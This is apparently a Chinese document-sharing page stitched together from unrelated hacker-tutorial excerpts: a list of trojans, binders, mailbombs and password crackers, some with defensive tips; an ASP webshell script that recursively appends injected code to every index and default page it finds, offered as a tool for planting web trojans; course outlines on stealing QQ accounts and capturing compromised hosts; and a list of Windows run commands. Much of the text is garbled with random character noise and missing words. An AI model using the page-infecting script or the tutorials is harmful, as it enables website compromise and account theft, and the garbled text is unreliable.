菜鸟速成黑客+第二课

合集下载

黑客菜鸟入门八种安全工具

黑客菜鸟入门八种安全工具

黑客菜鸟入门八种安全工具1、冰河冰河是最优秀的国产木马程序之一,同时也是被使用最多的一种木马说句心里话,如果这个软件做成规规矩矩的商业用远程控制软件,绝对不会逊于那个体积庞大、操作复杂的,但可惜的是,它最终变成了黑客常用的工具冰河的服务器端和客户端都是一个可执行文件,客户端的图标是一把瑞士军刀,服务器端则看起来是个没什么大不了的微不足道的程序,但就是这个程序,足以让你的电脑成为别人的掌中之物某台电脑执行了服务器端软件后,该电脑的端口就对外开放了,如果在客户端输入这台电脑的IP地址,就能完全控制这台电脑由于个人电脑每次上网的IP地址都是随机分配的,所以客户端软件有一个“自动搜索”功能,可以自动扫描某个IP段受感染的电脑,一旦找到,这台电脑就尽在黑客的掌握之中了由于冰河程序传播比较广泛,所以一般情况下,几分钟之内就能找到一个感染了冰河的受害者防御措施:首先不要轻易运行来历不明的软件,只要服务器端不被运行,冰河再厉害也是有力使不出,这一点非常重要;其次由于冰河的广泛流行,使得大多数杀毒软件可以查杀冰河,因此在运行一个新软件之前用杀毒软件查查是很必要的但由于该软件变种很多,杀毒软件如果不及时升级,难免会有遗漏,因此要保证您使用的杀毒软件病毒库保持最新用查杀木马软件如木马克星之类的也可以;安装并运行防火墙,如此则能相对安全一些2、可以利用系统的漏洞通过/IP协议向远程机器发送一段信息,导致一个错误,使之崩溃现象:电脑屏幕上出现一个蓝底白字的提示:“系统出现异常错误”,按键后又回到原来的状态,或者死机它可以攻击9X、、等系统并且可以自由设置包的大小和个数,通过连续攻击导致对方死机防御措施:不要轻易点击别人在论坛或聊天室告诉您的网址,那很可能是探测您的IP地址的;用写字板或其它的编辑软件建立一个文本文件,文件名为,内容如下:4[__\\ \\\]″″=″0″启动资源管理器,双击该文件即可;安装并运行防火墙 3、是基于的攻击的软件( ,网络基本输入输出系统),是一种应用程序接口(),作用是为局域网()添加特殊功能,几乎所有的局域网电脑都是在基础上工作的在我们的 95、99、或中,是和/IP捆绑在一起的这是十分危险的!但当我们安装/IP协议时,默认情况下和它的文件与打印共享功能也一起被装进了系统当运行时,你的后门打开了:因为不光允许局域网内的用户访问你的硬盘资源,上的黑客也能!正是利用了这一点防御措施:1) 检查是否出现在配置栏中打开控制面版,双击“网络”选项,打开“网络”对话框在“配置”标签页中检查己安装的网络组件中是否有如果没有,点击列表下边的添加按钮,选中“网络协议”对话框,在制造商列表中选择微软,在网络协议列表中选择点击确定,根据提示插入安装盘,安装2) 回到“网络”对话框,选中“拨号网络适配器”,点击列表右下方“属性”按钮在打开的“属性”对话框中选择“绑定”标签页,将除“/IP->网络适配器”之外的其它项目前复选框中的对勾都取消!3) 回到“网络”对话框,选中“/IP->拨号网络适配器”点击列表右下方“属性”按钮,不要怕弹出的警告对话框,点击“确定”在“/IP属性”对话框中选择“绑定”标签页,将列表中所有项目前复选框中的对勾都取消!点击“确定”,这时会警告你“尚未选择绑定的驱动器现在是否选择驱动器?”点击“否”之后,系统会提示重新启动计算机,确认4) 重新进入“/IP->拨号网络适配器”的“/IP属性”对话框,选定“”标签页,看到“通过/IP启用”项被清除了吧!连点两次“取消”退出“网络”对话框(不要点“确认”,免得出现什么意外)4、是一个功能强大的扫描器,速度奇快,探测中国台湾全部回应值小于MS的IP段仅用6个小时可以查看本机IP地址和域名,扫描一个IP段的所有在线主机以及其可探测到的端口号而且可以保存和导入所有已探测的信息防御措施:及时打补丁堵住漏洞微软的那些没完没了的补丁包是有用的,很多时候,这些补丁能有效堵住漏洞使我们的系统更安全一些尽管补丁包出现总会晚于漏洞的出现,但作为亡羊补牢的措施还是有必要的5、可以将指定的黑客程序捆绑到任何一个广为传播的热门软件上,使宿主程序执行时,寄生程序也在后台被执行当您再次上网时,您已经在不知不觉中被控制住了您说这个文件捆绑专家恐怖不?而且它支持多重捆绑实际上是通过多次分割文件,多次从父进程中调用子进程来实现的现象:几乎无危害:、、BO 常通过这种形式在上寄生传播如果有一天您收到一个不相识的人发来的不错的程序,请仔细检查一下,因为没准它是用捆绑了木马程序!防御措施:不要执行来历不明的软件,不要从不可靠的小站点上下载软件,任何新下载的程序在首次运行前,都要用最新的杀毒软件和查杀木马软件检查后才能使用另外,最好能知道一些常用软件的文件大小,一旦发现文件大小有变化尤其是有明显增大表现,这时就该请出我们的杀毒软件和查杀木马软件了6、邮箱终结者类似的邮箱炸弹很多,它们的原理基本一致,最根本的目标就是涨破您的邮箱,使您无法正常收发E-防御措施:要注意自己的网上言行,不要得罪人;不要轻易留下您的E-信箱地址,特别是较重要的E-信箱更不能随意让别人知道,以免给“有心人”机会;申请较大的邮箱,然后启用邮箱过滤功能,一般的网站都有这种服务对付这类炸弹只能如此消极防御了7、流光这是国人小榕的作品,当我首次使用这个软件时,我被它深深地震住了这个软件能让一个刚刚会用鼠标的人成为专业级黑客,它可以探测3、、、、、、、$$;上的各种漏洞,并针对各种漏洞设计了不同的破解方案,能够在有漏洞的系统上轻易得到被探测的用户密码流光对9X、、上的漏洞都可以探测,使它成为许多黑客手中的必备工具之一,一些资深黑客也对它青睐有加防御措施:由于它综合了多种扫描探测方式,所以很难防备,对付它必须及时打好各种补丁,同时还要使用防火墙防火墙推荐使用国产个人防火墙——天网天网是非常好的防火墙软件,可以有效阻挡各种攻击,有非常灵活的规则设置规则?什么是规则?跟您直说了吧,规则是一系列的比较条件和一个对数据包的动作,就是根据数据包的每一个部分来与设置的条件比较,当符合条件时,就可以确定对该包放行或者阻挡明白了吧?通过合理的设置规则就可以把有害的数据包挡在你的机器之外如果您不熟悉网络,最好不要调整它,您可以直接使用天网帮您设计的规则如果您熟悉网络,就可以非常灵活的设计合适自己使用的规则虽然天网有些过于敏感,经常对一些正常的文件传送报警,但这并不妨碍这个软件成为优秀的防火墙软件天网免费注册,即使不注册也不影响使用8、溯雪还是小榕的作品该软件利用、对免费信箱、论坛、聊天室进行密码探测的软件密码探测主要是通过猜测生日的方法来实现,成功率可达60%-70%溯雪的运行原理是通过提取、页面表单,搜寻表单运行后的错误标志,有了错误标志后,再挂上字典文件来破解信箱密码用溯雪来探测信箱密码真的是很容易,由于许多人对密码的设置采用了自己的生日或常用英文单词等较简单的方式,这给溯雪留下了很大的施展空间我曾用自己的信箱做过试验,采用生日作为密码,溯雪只用了不到3分钟就成功的破解出了我的密码!要知道我用的字典很大,若字典再小些,会更快的!防御措施:首先不要轻易暴露自己的信箱地址和论坛、聊天室的用户名,以免引起“有心人”注意;其次把您的密码设置复杂一些,不要设置成纯数字或纯字母,更不能少于7位,否则真的很危险可以将密码设置成数字与字母相结合型,并且长度大于7位以上,如设置为这种样式:g19o79o09d19这个密码是英文单词和生日的组合,记忆容易,长度又很长,是很难破解的;再次要经常更换密码,一个密码使用时间不能太长;最后一点,最好各个信箱密码都不同,以免被人一破百破。

黑客技术入门教程

黑客技术入门教程

黑客技术入门教程黑客技术入门教程黑客技术入门教程第一节、黑客的种类和行为以我的理解,“黑客”大体上应该分为“正”、“邪”两类,正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻击、入侵或者做其他一些有害于网络的事情,因为邪派黑客所从事的事情违背了《黑客守则》,所以他们真正的名字叫“骇客”(Cracker)而非“黑客”(Hacker),也就是我们平时经常听说的“黑客”(Cacker)和“红客”(Hacker)。

无论那类黑客,他们最初的学习内容都将是本部分所涉及的内容,而且掌握的基本技能也都是一样的。

即便日后他们各自走上了不同的道路,但是所做的事情也差不多,只不过出发点和目的不一样而已。

很多人曾经问我:“做黑客平时都做什么?是不是非常刺激?”也有人对黑客的理解是“天天做无聊且重复的事情”。

实际上这些又是一个错误的认识,黑客平时需要用大量的时间学习,我不知道这个过程有没有终点,只知道“多多益善”。

由于学习黑客完全出于个人爱好,所以无所谓“无聊”;重复是不可避免的,因为“熟能生巧”,只有经过不断的联系、实践,才可能自己体会出一些只可意会、不可言传的心得。

在学习之余,黑客应该将自己所掌握的知识应用到实际当中,无论是哪种黑客做出来的事情,根本目的无非是在实际中掌握自己所学习的内容。

第二节、黑客应掌握的基本技能从这一节开始,我们就真正踏上学习黑客的道路了,首先要介绍的是作为一名初级黑客所必须掌握的基本技能,学习这可以通过这一节的阅读了解到黑客并不神秘,而且学习起来很容易上手。

为了保证初学者对黑客的兴趣,所以本书采取了循环式进度,也就是说每一章节的内容都是独立、全面的,学习者只有完整的学习过一章的内容,才能够进而学习下一章的内容。

一、了解一定量的英文:学习英文对于黑客来说非常重要,因为现在大多数资料和教程都是英文版本,而且有关黑客的新闻也是从国外过来的,一个漏洞从发现到出现中文介绍,需要大约一个星期的时间,在这段时间内网络管理员就已经有足够的时间修补漏洞了,所以当我们看到中文介绍的时候,这个漏洞可能早就已经不存在了。

hack菜鸟教程

hack菜鸟教程

菜鸟教程~~0 m7 Y6 M& t1 C8 c本帖隐藏的内容需要回复才可以浏览我的工具: ) {/ a; _" {1 r) ?, @/ `: n. X' e1,免杀的ms0614网马.(自己多看点文章,也要做免杀)2,盗Q黑侠最新版3,空间(我用的webshell) ' O) t3 j+ L* u4 u5 `4,CQQtools.(查看QQ资料的)先配置好盗Q黑侠的服务端,配置盗Q黑侠的时候,选择选用asp收信. . X) r- ]" r" Tasp收信程序代码: 5 N: M) n1 r: x G, C! ^5 Q/ j2 f/ W% f$ U' W其中的XXX.txt一定要修改名字,防止别人探测到默认的名字.否则你的成果就被别人拿走了哦. % J. L! W. q/ ?4 [; I0 R然后把盗Q黑侠的服务端传到你的空间里面去.配置好ms0614网马.MS0614网马最新免杀代码(忍痛放出): + }9 Y. @! _) z$ K1 {" M! q a6 ~ P0 k3 a1 K+ S3 B, i1 ?$ K; J x. Y) x* m4 d' ~网站为您报时!( g6 m! A; B" s8 p0 O这个代码,我加入了IE的一个小漏洞,别人打开这个htm的时候,点查看源文件,是看不到代码的.不过,你用2 C$ t. D7 ^4 |6 HIE标准按钮里面的用记事本打开,还是: u' m4 F* Y( R q- V6 M8 D可以看到的.把里面的/heng.exe修改成你木马的地址. * }( V$ s: ?& J然后开始挂马,大家干hack这么多年,,相信手上都多少都应该都点webshell把,,把他们挂到上去. 9 Z! r8 q" d" |) A0 w9 e挂马的代码:这里推荐2款工具. * a% h7 t: C6 a第一款:4 j( P3 r+ f' z# V. ^9 p5 I- W# n) K$ P, c0 ^7 ]; h/ n, Y9 G m. A; p u<**** http-equiv="Content-Type" c> & n9 i% B: F; o0 S% o( B# }4 N& }% f4 f6 v7 e3 X& z<% 6 x& x# V& N4 |# a* S2 n/ SASP_SELF=Request.ServerVariables("PA TH_INFO") $ k- s% ]6 Y5 K. a' q# m# \ s=Request("fd")ex=Request("ex") # I$ X/ w% K J* s5 h7 i" qpth=Request("pth") 8 Z( T% A* Q- }) z8 r9 Wnewcnt=Request("newcnt") * R0 h1 h' k! M; T/ J/ VIf ex"" AND pth"" Thenselect Case ex * o& Q1 `; c: Q& O% _5 p8 A$ E' H/ [Case "edit"CALL file_show(pth)Case "save"CALL file_save(pth)End selectElse " d7 A8 P+ R5 {$ x%>6 i7 {4 S9 B7 L" u9 V1 k<FORM action="" method=post>8 ^* N4 ~, h, m* E7 S$ h8 m0 TFOLDER (ABSOLUTE PATH): q/ ~0 p. V8 O+ V2 @; J2 x) \) a) Y R+ B) f3 C: [1 \2 ]7 W& b% F- C- F, l% y2 B8 ^) H& @4 L% E) z/ v' H N<% , A( d7 T; j: b( b" Z& dFunction IsPattern(patt,str)Set regEx=New RegExp 0 o( T2 j2 n* T$ v6 _' lregEx.Pattern=pattregEx.IgnoreCase=TrueretVal=regEx.Test(str) & { Y- J0 q6 E' wSet regEx=Nothing / ?3 l6 V6 ~& XIf retVal=True Then ! J6 S/ ]) ~1 q. X5 a- e! nIsPattern=TrueElse 9 d7 i- s$ {9 RIsPattern=False 5 {/ W0 Z3 B9 _: Z# IEnd If 7 _( Y; S- x7 ?6 |4 M2 _- {End FunctionIf IsPattern("[^ab]{1}:{1}([url=file://\\|\/)]\\|\/)",s[/url]) Thensch s * E4 i. ]% I& m yElse : T( D0 B$ T5 W" h! IIf s"" Then Response.Write "Invalid Agrument!"End If * e1 }! T5 Y, k$ ?2 pSub sch(s) ; C7 D+ m1 M1 d: ~# FoN eRrOr rEsUmE nExTSet fs=Server.createObject("Scripting.FileSystemObject") $ U7 [: r+ p: P/ P4 m1 w4 FSet fd=fs.GetFolder(s) 5 J" s9 ` x2 ~; i" tSet fi=fd.FilesSet sf=fd.SubFoldersFor Each f in fi . Z- _" v/ P5 q% h# yrtn=f.Path 0 S, f! [' @5 _& m8 x+ X6 V; dstep_all rtnNext 5 D4 _1 e9 o, \9 FIf sf.Count0 ThenFor Each l In sfsch lNextEnd If 2 \4 x0 [, E0 @# ]0 q n {& n+ a: bEnd SubSub step_all(agr) X$ i6 ^8 z7 i4 C; A- l/ \* P9 e: cretVal=IsPattern("([url=file://\\|\/)(default|index)\.(htm|html|asp|php|jsp)\b]\\|\/)( c$ a( A! T0 c* f' Z$ H : o; V% O" O" U% o" V' y* y(default|index)\.(htm|html|asp|php|jsp)\b",agr[/url])If retVal Thenstep1 agr : m: o/ @1 ?) y; ?( J2 E; \step2 agrElseExit SubEnd IfEnd Sub 6 F5 w/ C8 t5 g& z/ \( x3 ?* K3 Z& p%>[url=/<%=ASP_SELF%][/url]4 n( `& W( b- c+ u: [; V0 N1 J1 n l" g" h7 l5 Z. m- @3 S1 b<%Sub step2(str2)addcode=""Set fs=Server.createObject("Scripting.FileSystemObject")isExist=fs.FileExists(str2)If isExist Then - f. {( w- B3 B c% t; M) ^8 y4 f& eSet f=fs.GetFile(str2)Set f_addcode=f.OpenAsTextStream(8,-2)f_addcode.Write addcode 5 l& W V/ A4 y1 { i: G% d, _f_addcode.Close + H1 n$ Z7 }( F% s0 wSet f=Nothing # S0 P% G8 `" k) y9 rEnd If 7 a; K/ V+ }6 f, p; x8 X# TSet fs=NothingEnd Sub ' B+ j: d8 l3 `7 h1 Q%>! v2 U5 X1 X7 [% z9 wFILE:<FORM action="" method=post><%=cnt%><INPUT type=hidden value="" name=pth> $ p3 M2 y2 d: t: x: w- F# V" s9 O% H+ Y M! U+ p- P" U1 {6 U" n, \# t' r: b1 T. L; \" v" t2 ]" X) |; l$ G" A( ]" {- ~( y% LTHE FILE IS NOT EXIT OR HA VE deleteD.: b# r, \5 j* z- d, Y. H* }5 I% E! O! |" w+ ?$ R0 V这是一个webshell下自动挂马程序,当然其中也有我们需要修改的地方。

从零开始学习黑客技术入门教程(基础)

从零开始学习黑客技术入门教程(基础)

最简单的黑客入门教程目录1 黑客简介 (2)2 保护自己电脑绝对不做黑客肉鸡 (2)3 抓肉鸡的几种方法 (5)4 防止黑客通过Explorer侵入系统 (9)5 SQL注入详解 (10)5.1 注入工具 (11)5.2 php+Mysql注入的误区 (11)5.3 简单的例子 (12)5.4 语句构造 (14)5.5 高级应用 (22)5.6 实例 (26)5.7 注入的防范 (29)5.8 我看暴库漏洞原理及规律1 (29)5.9 我看暴库漏洞原理及规律2 (32)6 跨站脚本攻击 (34)6.1 跨站脚本工具 (34)6.2 什么是XSS攻击 (35)6.3 如何寻找XSS漏洞 (35)6.4 寻找跨站漏洞 (36)6.5 如何利用 (36)6.6 XSS与其它技术的结合 (37)7 XPath注入 (38)7.1 XPath注入介绍 (38)7.2 XPath注入工具 (41)声明:文章来源大多是网上收集而来,版权归其原作者所有。

1黑客简介"黑客"(hacker)这个词通常被用来指那些恶意的安全破坏者。

关于"黑客"一词的经典定义,最初来源于麻省理工学院关于信息技术的一份文档,之后便被新闻工作者们长期使用。

但是这个在麻省理工被当做中性词汇的术语,却逐渐被新闻工作者们用在了贬义的环境,而很多人也受其影响,最终导致了"黑客"一词总是用于贬义环境。

有些人认为,我们应该接受"黑客"一词已经被用滥并且有了新的意义。

他们认为,如果不认可这种被滥用的词汇,那么将无法与那些不懂技术的人进行有效的交流。

而我仍然认为,将黑客和恶意的骇客(cracker)分开表述,对交流会更有效,比如使用"恶意的安全骇客"会更容易让对方理解我所指的对象,从而能够达到更好的沟通交流效果,也避免了对"黑客"一词的滥用。

菜鸟FCHACK初级入门教程

菜鸟FCHACK初级入门教程

菜鸟FCHACK初级⼊门教程菜鸟FC HACK初级⼊门教程很多新⼿看到FC HACK,都会有兴趣吧,我也⼀样,看到了有HACK ROM,也会想要是⾃⼰会做HACK多好。

摸索了⼀阵,偶也学会了⼀点点简单HACK。

当然HACK这东西,是需要很⼤耐⼼的,更要⾃⼰多尝试!与其在⼀边⼤喊:“HACK好难啊,HACK好复杂啊,教程看了头晕啊”还不如⾃⼰多动动⼿。

今天我就来写⼀个最最最简单的基础HACK教程,相信你如果有耐⼼看完,⼀定能学会的。

编程⽅⾯的东西我懂的不是太多,我只⽤最通俗易懂的⽅式,让⼤家能学会。

如果有专业术语等的语⾔错误,也请⼤家纠正。

⾸先我们需要⼀些⼯具[带有DEBUG调试功能的FC模拟器] fcdebug或者FCEU-0.98.13-pre-Debug(貌似这两个⼀样的,只是版本问题)[6502(FC汇编语⾔)] 6502汇编⼤奥秘(⽤于查看指令,便于修改,本次教程⼏乎⽤不到,有兴趣研究指令和代码的可以多看看。

但是这还是必备⼯具哦))最后⽤于修改ROM内部的⼯具UltraEdit32这是必须品哦字串3----------------------------------------------------------------------⾸先,我们打开FCE,FCE也是FC模拟器的⼀种。

当然我们⽤的是带DEBUG(调试)功能的FCE使⽤VNES的DEBUG调试时,机器配置不好的就狂卡,偶的机⼦也卡。

所以在某⼈要求之下。

我换⼀种调试器给⼤家讲解。

我⽤魂⽃罗1来做⼀个命不减的HACK教程教⼤家我们先去EC⾥找该游戏作弊码,EC⾥的作弊码是这样的[P1 ⽣命数]ON=0032,200这样我们就知道魂1的⽣命的地址是32,就可以使⽤它来当“断点”。

FCE的调试器和VNES 不⼀样,不需要⽤“[0032]”这样的标准格式,直接把“32”输⼊当断点就可以了,具体怎么弄?别急,慢慢往下看~⾸先我们打开FCE,使⽤“OPEN”打开游戏ROM,就象你玩游戏那样~~字串9游戏运⾏后,先开始游戏,这时候先暂停游戏。

菜鸟黑客的入侵经历

菜鸟黑客的入侵经历
… 搬 … l… 2 … “ l…
2 … I



【 I 2
j j 【 ]
【 ] 2
‰ ¨
l m M l b¨ l b¨
lh b
这 些不道 德的 行为在 互联 网的环 境下 确实难 以管 束 , 然而产 生这些现 象 的原因也 是 多方面 的。 一方面 是如 今做 黑 客太 容易了, 过搜 索 引擎就 通 能找到 很多相 关的 资料 和工具 , 另一方面是 很多人 的 电脑 处于 不安全 的状 态。 就在 这个社 区里 , 者轻 易地得 到了—段攻击视频 。 笔 这样, 网上有 大 把的 肉鸡 , 也有 大把 的黑 客 教 程 , 想成 为 一名 菜鸟 黑 客有多简 单呢?笔者 没有任 何黑 客 经验 , 不过在 看完 了这段 的15 口 3端 入侵 演 示动画后 , 葫芦 画 瓢地 很 陕就 学会了这 种简单 的入侵方 法 。 依
■ } r 挑

_ l


; 2 2 4 E 2 f《 [2 0 ”l
1 t ,■ … 川 Tt
毒 ■& 嘲 糊 霸 黔
[2 … 22
[ … … …
20 11

i ■t l _ 1 l
& ■ 、 , ' l 4 :
[ 一

^ l川 d E j
维普资讯
NT cn 我 们 打开 刚 才生 成 的 R s ltt sa 。 e utx . 文件, 除多 余的 信息 , 删 只留 TI地 址 , P 然 后保存 。 接着 用NTa nY 该 文件 , sc  ̄开 选择 W MI 扫描 , 口一栏 输入 15 就 可开始进 端 3, 行筛选 。 NT c n 根 据 字 典 文件 中设 置 的用 sa 会 户名和 口令 来筛 选 出那 些 空 口令或 者弱 口 令 的电脑 ( : 注 字典 文件 是NT ue. c _ sr i和 d

菜鸟黑客技术学习入门

菜鸟黑客技术学习入门

菜鸟黑客技术入门指南一序言学东西如果找到好的方法,会事半功倍。

反之则事倍功半了。

黑客的入门学习也是如此。

因此我总结了一下我个人的一些学习方法与心得(当然有一些方法也是网上的朋友教我的),希望能给刚入门的朋友一些参考,使其少走弯路。

如果您是一只老鸟,觉得这个教程对您毫无帮助,那么请您跳过此教程,毕竟不是所有人都像您一样掌握了良好的学习方法,那些迷惑中的菜鸟,正需要这样一个教程!以下序号不分先后,希望大家也能拿出你们自己的心得体会来补充。

二具体hack学习方法1 利用搜索引擎这是一种高效的学习方法,相信每个高手都从这里受益匪浅,这也是菜鸟最好的老师,她随叫随到,言听即从,力量强大。

强烈建议大家在遇到问题前,先请教一下/1)公共搜索引擎比如大名鼎鼎的Google(别告诉我你不知道哟),还有百度等。

利用这类搜索引擎,你几乎可以搜到任何你想要的东西,比如:文章,教程,软件,安全站点,安全论坛,一切的一切。

所以以后不要再问诸如3389是什么端口(去搜一下3389+空格+端口+空格+漏洞);流光在哪里下载(去搜流光+空格+工具+空格+下载);ipc$怎样利用(去搜ipc$Content$空格+入侵+空格+教程)等完全可以向搜索引擎请教的问题,如果你非要问一下,没关系,你会得到简单明了的答案:‘去搜!!’请不要埋怨这位高手不耐心,面对千百个这样的菜鸟问题,他这么做已经很人道了。

因此可以看出,掌握良好的学习技巧对菜鸟来说是多莫重要,不少菜鸟就是因为像这样到处碰壁后,最终放弃了hack学习。

*不会利用搜索引擎对菜鸟来说是致命的,你将举步为艰,反之,你将进步神速。

2)站点内部/论坛的搜索引擎使用方法上大同小异,比如你现在需要一篇教程或是一个hack 软件,而你又觉得google上搜出来的东西太杂或觉得没有专业性,那么这时候你就可以到各大安全站点或论坛上去搜索,比如/;安全焦点;红客联盟;小榕的论坛;/等,在这些站点的内部引擎里搜到的教程或软件,一般都是比较有保证的。

Hacker教程

Hacker教程

菜鸟基础班讲师:阳光*************************************************第一课超速黑客安全学习法总结/20081115/hxhack01.rar 第二课手工关闭被黑客扫描端口/20081115/hxhack02.rar 第三课杀毒软件安装和配置设置/20081115/hxhack03.rar 第四课防火墙的安装和配置应用/20081115/hxhack04.rar 第五课黑客必用虚拟机安装教程/20081115/hxhack05.rar 第六课黑客常见DOS学习并掌握/20081115/hxhack06.rar 第七课:网马制作与防御中马专题/20081115/hxhack07.rar 第八课菜鸟学习VPN代理隐藏自己/20081115/hxhack08.rar 第九课服务器建立隐藏帐号与查找隐藏帐号/20081115/hxhack09.rar 第十课QQ盗号与防盗专题/20081115/hxhack10.rar 第十一课QQ制作钓鱼网站盗与御专题/20081115/hxhack11.rar 第十二课软件捆绑木马与反捆绑技术/20081115/hxhack12.rar 第十三课上兴远控专题(配置,使用)/20081115/hxhack13.rar 第十四课上兴远控专题内网篇-路由上线/20081115/hxhack14.rar 第十五课网页插入隐藏后门/20081115/hxhack15.rar 第十六课DDOS软件使用教程/20081115/hxhack16.rar 第十七课常见挂马技术讲解和实战演示/20081115/hxhack17.rar 第十八课实战3389端口入侵抓肉鸡/20081115/hxhack18.rar 第十九课批量135抓肉鸡工具配置使用/20081115/hxhack19.rar 第二十课抓4899弱口令肉鸡/20081115/hxhack20.rar 第二十一课CHM木马的制作第二十二课手把手破解路由密码/20081115/hxhack22.rar 第二十三课制作隐蔽RM木马全攻略码/20081115/hxhack23.rar 第二十四课Doc文本捆绑木马抓肉鸡演示/20081115/hxhack24.rar 第二十五课利用ARP欺骗获得FTP密码/20081115/hxhack25.rar(请大家耐心等待更新)*************************************************入侵渗透提权讲师:职业色狼*************************************************动力后台拿shell/20081115/ypde01.rar渗透讲解教程/20081115/ypde02.rar利用肉鸡建立VPN/20081115/ypde03.rar利用弱口令拿服务器/20081115/ypde04.rar利用install.asp拿z-blog shell/20081115/ypde05.rar ms08067漏洞的利用/20081115/ypde06.rar pjblog相册2.0漏洞/20081115/ypde07.rar利用SA注射点拿系统/20081115/ypde08.rar(请大家耐心等待更新)************************************************* delphi编程班讲师:阿杰************************************************* delphi基础知识第一课/20081115/delphi01.rar delphi基础知识第二课/20081115/delphi02.rar delphi第三课-编写记事本/20081115/delphi03.rar delphi第四课-编写音频视频播放器delphi第五课-编写邮件发送程序/20081115/delphi05.rar delphi第六课-编写IE浏览器/20081115/delphi06.rar delphi第七课-编写QQ防盗登录器/20081115/delphi07.rar delphi第八课-编写网络验证程序/20081115/delphi08.rar (请大家耐心等待更新)脚本入侵班讲师:阳光*************************************************第一课网站入侵概述/20081115/jbrq01.rar第二课常见网站入侵软件介绍和使用/20081115/jbrq02.rar第三课数据库备份技术详解(实例演示)/20081115/jbrq03.rar第四课抓包改包入侵网站(实例演示)/20081115/jbrq04.rar第五课一句话木马2种方法入侵网站(实例演示) /20081115/jbrq05.rar第六课Cookie欺骗的简单讲解+利用实例/20081115/jbrq06.rar第七课 .asp解分漏洞实战入侵/20081115/jbrq07.rar第八课旁注入侵思路及条件/20081115/jbrq08.rar第九课啊D+google获得大量注入点/20081115/jbrq09.rar第十课数据库恢复技术入侵网站/20081115/jbrq10.rar第十一课ewebeditor编辑器漏洞入侵/20081115/jbrq11.rar第十二课巧妙利用漏洞入侵科讯网站/20081115/jbrq12.rar(请大家耐心等待更新)提权入侵班讲师:阳光*************************************************第一课提权概述/20081115/tqrq01.rar第二课serv-u服务器提权(目录无修改权限)/20081115/tqrq02.rar第三课serv-u服务器提权(目录有修改权限)/20081115/tqrq03.rar第四课pcanywhere提权方法/20081115/tqrq04.rar第五课FlashFXP替换文件提权/20081115/tqrq05.rar第六课VNC密码破解提权/20081115/tqrq06.rar第七课CAIN 嗅探3389密码提权/20081115/tqrq07.rar第八课替换服务提权/20081115/tqrq08.rar第九课利用HASH破解提权/20081115/tqrq09.rar第十课启动项提权/20081115/tqrq10.rar第十一课CAcls命令在提权中的使用/20081115/tqrq11.rar第十二课Windows-2003-webshell默认权限/20081115/tqrq12.rar第十三课Windows 2003服务器默认文件夹权限/20081115/tqrq13.rar第十四课利用perl提升权限/20081115/tqrq14.rar第十五课端口映射解决内网提权/20081115/tqrq15.rar。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

关于运行命令
cmd.exe-----------------DOS命令提示符
regedit.exe--------------注册表
gpedit.msc---------------组策略
Msconfig.exe-------------系统配置实用程序
services.msc--------------本地服务设置
regsvr32 /u zipfldr.dll----屏蔽XP的ZIP解压功能
regsvr32 zipfldr.dll ------ 开启XP的ZIP解压功能
regsvr32 /u *.dll----------停止dll文件运行
iexplore -channelband ---收藏夹
netstat -na --------------- 查看打开的端口
chkntfs /t:0 -------------- 设置开机时磁盘检查的等待时间为0 ipconfig /all-------------- 查看本机IP及网关等
winchat--------XP自带局域网聊天
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
notepad--------打开记事本
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
calc-----------启动计算器
chkdsk.exe-----Chkdsk磁盘检查
drwtsn32------ 系统医生
winmsd---------系统信息
sfc /scannow---扫描错误并复原
taskmgr--------任务管理器(2000/xp/2003)net stop messenger----停止信使服务
net start messenger---开始信使服务
oobe/msoobe /a--------检查XP是否激活
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具,系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
control userpasswords2------ 设置XP自动登录
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
sndrec32-------录音机
Nslookup-------IP地址侦测器
explorer-------打开资源管理器
logoff---------注销命令
tsshutdn-------60秒倒计时关机命令
lusrmgr.msc----本机用户和组
cleanmgr-------垃圾整理
compmgmt.msc---计算机管理conf-----------启动netmeeting dvdplay--------DVD播放器
charmap--------启动字符映射表
diskmgmt.msc---磁盘管理实用程序
dfrg.msc-------磁盘碎片整理程序
devmgmt.msc--- 设备管理器
rononce -p ----15秒关机
rsop.msc-------组策略结果集
mem.exe--------显示内存使用情况
progman--------程序管理器
perfmon.msc----计算机性能监测程序
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI) wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕“讲述人”
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
本篇文章来源于黑基网-中国最大的网络安全站点原文链接:/tech/2010-02-22/59313.html。

相关文档
最新文档